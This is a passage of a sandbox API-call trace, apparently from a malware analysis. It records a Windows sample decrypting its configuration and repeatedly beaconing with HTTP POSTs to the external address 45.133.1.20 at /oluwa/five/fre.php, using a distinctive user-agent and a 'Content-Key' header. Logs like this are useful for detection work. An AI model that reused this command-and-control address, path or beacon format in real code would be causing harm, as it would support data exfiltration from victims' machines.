0x6a0000 [0269.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0269.382] socket (af=2, type=1, protocol=6) returned 0x970 [0269.383] connect (s=0x970, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0269.404] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0269.404] GetProcessHeap () returned 0x6a0000 [0269.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0269.417] GetProcessHeap () returned 0x6a0000 [0269.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0269.418] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0269.419] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0269.419] GetProcessHeap () returned 0x6a0000 [0269.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9db0 [0269.419] GetProcessHeap () returned 0x6a0000 [0269.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0269.420] GetProcessHeap () returned 0x6a0000 [0269.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0269.420] GetProcessHeap () returned 0x6a0000 [0269.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0269.420] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0269.421] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0269.421] GetProcessHeap () returned 0x6a0000 [0269.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0269.421] GetProcessHeap () returned 0x6a0000 [0269.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0269.422] send (s=0x970, buf=0x6bd460*, len=242, flags=0) returned 242 [0269.422] send (s=0x970, buf=0x6bb998*, len=159, flags=0) returned 159 [0269.423] GetProcessHeap () returned 0x6a0000 [0269.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0269.423] recv (in: s=0x970, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0269.494] GetProcessHeap () returned 0x6a0000 [0269.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0269.495] GetProcessHeap () returned 0x6a0000 [0269.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0269.495] GetProcessHeap () returned 0x6a0000 [0269.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9db0 | out: hHeap=0x6a0000) returned 1 [0269.496] GetProcessHeap () returned 0x6a0000 [0269.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0269.496] closesocket (s=0x970) returned 0 [0269.497] GetProcessHeap () returned 0x6a0000 [0269.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0269.497] GetProcessHeap () returned 0x6a0000 [0269.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0269.497] GetProcessHeap () returned 0x6a0000 [0269.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0269.499] GetProcessHeap () returned 0x6a0000 [0269.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0269.499] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16f4) returned 0x970 [0269.505] Sleep (dwMilliseconds=0xea60) [0269.507] GetProcessHeap () returned 0x6a0000 [0269.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0269.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.509] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.521] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0269.531] GetProcessHeap () returned 0x6a0000 [0269.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0269.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.533] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0269.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.538] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.539] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.539] GetProcessHeap () returned 0x6a0000 [0269.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0269.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.578] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0269.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.583] CryptDestroyKey (hKey=0x6ad020) returned 1 [0269.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.590] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0269.590] GetProcessHeap () returned 0x6a0000 [0269.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0269.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.597] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0269.599] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.599] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0269.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.615] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0269.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.622] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0269.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0269.634] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0269.643] GetProcessHeap () returned 0x6a0000 [0269.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0269.644] GetProcessHeap () returned 0x6a0000 [0269.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0269.654] GetProcessHeap () returned 0x6a0000 [0269.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0269.654] GetProcessHeap () returned 0x6a0000 [0269.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0269.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.655] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.662] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0269.669] GetProcessHeap () returned 0x6a0000 [0269.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0269.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.670] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0269.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.671] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.673] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.673] GetProcessHeap () returned 0x6a0000 [0269.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0269.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.679] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0269.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.681] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0269.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.685] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0269.685] GetProcessHeap () returned 0x6a0000 [0269.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0269.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.686] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0269.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.687] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0269.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.688] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0269.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.689] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0269.689] GetProcessHeap () returned 0x6a0000 [0269.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0269.689] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0269.689] GetProcessHeap () returned 0x6a0000 [0269.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0269.689] socket (af=2, type=1, protocol=6) returned 0x974 [0269.689] connect (s=0x974, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0269.712] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0269.712] GetProcessHeap () returned 0x6a0000 [0269.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0269.712] GetProcessHeap () returned 0x6a0000 [0269.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0269.713] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0269.713] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0269.713] GetProcessHeap () returned 0x6a0000 [0269.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9ff0 [0269.713] GetProcessHeap () returned 0x6a0000 [0269.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0269.715] GetProcessHeap () returned 0x6a0000 [0269.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0269.715] GetProcessHeap () returned 0x6a0000 [0269.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0269.715] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0269.717] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0269.717] GetProcessHeap () returned 0x6a0000 [0269.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0269.717] GetProcessHeap () returned 0x6a0000 [0269.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0269.718] send (s=0x974, buf=0x6bd460*, len=242, flags=0) returned 242 [0269.719] send (s=0x974, buf=0x6bb998*, len=159, flags=0) returned 159 [0269.719] GetProcessHeap () returned 0x6a0000 [0269.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0269.719] recv (in: s=0x974, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0269.817] GetProcessHeap () returned 0x6a0000 [0269.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0269.818] GetProcessHeap () returned 0x6a0000 [0269.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0269.818] GetProcessHeap () returned 0x6a0000 [0269.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9ff0 | out: hHeap=0x6a0000) returned 1 [0269.819] GetProcessHeap () returned 0x6a0000 [0269.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0269.819] closesocket (s=0x974) returned 0 [0269.820] GetProcessHeap () returned 0x6a0000 [0269.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0269.820] GetProcessHeap () returned 0x6a0000 [0269.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0269.821] GetProcessHeap () returned 0x6a0000 [0269.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0269.821] GetProcessHeap () returned 0x6a0000 [0269.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0269.822] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16f8) returned 0x974 [0269.823] Sleep (dwMilliseconds=0xea60) [0269.828] GetProcessHeap () returned 0x6a0000 [0269.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0269.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.830] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.837] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0269.846] GetProcessHeap () returned 0x6a0000 [0269.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0269.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.850] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0269.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.857] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.861] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.861] GetProcessHeap () returned 0x6a0000 [0269.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0269.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.863] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0269.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.864] CryptDestroyKey (hKey=0x6ad020) returned 1 [0269.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.865] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0269.865] GetProcessHeap () returned 0x6a0000 [0269.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0269.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.867] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0269.868] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.868] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0269.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.870] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0269.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.871] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0269.871] GetProcessHeap () returned 0x6a0000 [0269.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0269.871] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0269.871] GetProcessHeap () returned 0x6a0000 [0269.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0269.872] GetProcessHeap () returned 0x6a0000 [0269.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0269.872] GetProcessHeap () returned 0x6a0000 [0269.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0269.873] GetProcessHeap () returned 0x6a0000 [0269.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0269.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.874] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.884] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0269.896] GetProcessHeap () returned 0x6a0000 [0269.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0269.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.897] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0269.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.898] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.900] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.900] GetProcessHeap () returned 0x6a0000 [0269.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0269.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.902] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0269.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.907] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0269.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.908] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0269.908] GetProcessHeap () returned 0x6a0000 [0269.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0269.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.909] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0269.910] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.911] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0269.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.912] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0269.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.913] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0269.913] GetProcessHeap () returned 0x6a0000 [0269.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0269.914] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0269.914] GetProcessHeap () returned 0x6a0000 [0269.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0269.914] socket (af=2, type=1, protocol=6) returned 0x978 [0269.914] connect (s=0x978, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0269.938] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0269.938] GetProcessHeap () returned 0x6a0000 [0269.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0269.939] GetProcessHeap () returned 0x6a0000 [0269.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0269.939] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0269.940] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s 